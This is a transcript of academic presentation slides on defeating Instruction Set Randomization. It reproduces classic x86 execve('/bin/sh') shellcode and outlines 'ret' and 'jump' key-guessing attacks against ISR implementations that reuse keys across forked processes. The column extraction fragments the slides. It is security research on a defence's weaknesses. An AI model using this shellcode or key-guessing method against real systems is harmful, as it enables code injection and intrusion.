Defeating Instruction Set Randomization Nora Sovarel Buffer Overflow “the vulnerability of the decade” ●Known since 1998 ●Lots of defenses proposed ● ● ● ● ● ● Non-Executable Buffers Array Bounds checking Address Space.

Download Report

Transcript Defeating Instruction Set Randomization Nora Sovarel Buffer Overflow “the vulnerability of the decade” ●Known since 1998 ●Lots of defenses proposed ● ● ● ● ● ● Non-Executable Buffers Array Bounds checking Address Space.

Defeating Instruction Set Randomization
Nora Sovarel
Buffer Overflow
“the vulnerability of the decade”
●Known since 1998
●Lots of defenses proposed
●
●
●
●
●
●
Non-Executable Buffers
Array Bounds checking
Address Space Layout Randomization
StackGuard/PointGuard
Instruction Set Randomization
Why is still an issue in 2004?
I don’t know 
Maybe, lack of interest…
Maybe, none of the defences is good
enough…
What about Instruction Set Randomization?
Attack String - execve
[BUFFER OVERFLOWS DEMYSTIFIED, by [email protected]]
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
xorl
pushl
pushl
pushl
movl
pushl
pushl
movl
cdql
movb
int
%eax,%eax
%eax
$0x68732f2f
$0x6e69622f
%esp,%ebx
%eax
%ebx
%esp,%ecx
$0x0b,%al
$0x80
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
Instruction Set Randomization
31
c0
50
68
2f
2f
73
68
68
2f
62
69
^
^
^
^
^
^
^
^
^
^
^
^
12
ac
7d
9c
a2
55
38
cc
31
0c
7d
91
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
23
6c
2d
f4
8d
7a
4b
a4
59
23
1f
f8
6e
89
e3
50
53
89
e1
99
b0
0b
cd
80
^
^
^
^
^
^
^
^
^
^
^
^
82
ac
03
bc
90
ac
7d
97
a2
0c
90
dc
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
=>
ec
25
e0
ec
c3
25
9c
0e
12
07
5d
5c
Instruction Set Randomization
Code Actually Executed
Code Intended to Be Executed
23 6c 2d f4
and
31 c0
xor
8d 7a 4b
lea
50
push %eax
a4
movsb %ds:(%esi),%es:(%edi)
68 2f 2f 73 68
push $0x68732f2f
59
pop
%ecx
68 2f 62 69 6e
push $0x6e69622f
23 1f
and
(%edi),%ebx
89 e3
mov
f8
clc
ec
in
50
push %eax
25 e0 ec c3 25
and
53
push %ebx
9c
pushf
89 e1
mov
0e
push %cs
99
cltd
12 07
adc
(%edi),%al
b0 0b
mov
5d
pop
%ebp
cd 80
int
5c
pop
%esp
00 00
add
%al,(%eax)
0xfffffff4(%ebp,%ebp,1),%ebp
0x4b(%edx),%edi
(%dx),%al
$0x25c3ece0,%eax
%eax,%eax
%esp,%ebx
%esp,%ecx
$0xb,%al
$0x80
Can the key be guessed?
32 bit key => 4,294,967,296 possibilities
32 bit key, guess 16 bits and 16 bits =>
2 * 65,536 = 131,072 possibilities
32 bit key, guess 8 bits at a time =>
4 * 256 = 1,024 possibilities
Problems
[Randomized instruction set emulation to disrupt binary code injection
attacks, Barrantes & all]
Solutions
Use a 16 or 8 bits instruction
Notice a good guess
–
–
Infinite loop
Normal behavior
Infinite Loop
Use jump near – two bytes instruction
Advantage
● Can be used against any application with a
buffer overflow vulnerability
Disadvantage
● Large number of possibilities
Normal Behavior
Use ret – one byte instruction
Advantage
● Very fast – 256 tries at most
Disadvantages
● Needs a response from application
● Needs special conditions to work
Assumptions
Use TCP to connect
Same randomization key for each restart
or
Same randomization key for all forked
processes
Jump Attack
Ret Attack
Instructions executed
leave ; restores ebp
ret ; normal return from function
ret ; injected instruction
Results
●
●
●
●
Simple application with a buffer overflow
vulnerability
ISR implementation uses the same key for
each forked process
Ret attack works and guesses the key
most of the times
Jump attack
–
–
Works when checks one key at each run
Unexpected behavior after a large number of tries
Future Work
●
●
●
Fix the jump attack to guess the key
Attack a real application with a buffer
overflow vulnerability
Attack a real ISR implementation
Conclusions
●
Under the specified assumptions the
attack is possible
●
x86 arhitecture helps the attacker
●
Infinite loops are sometimes useful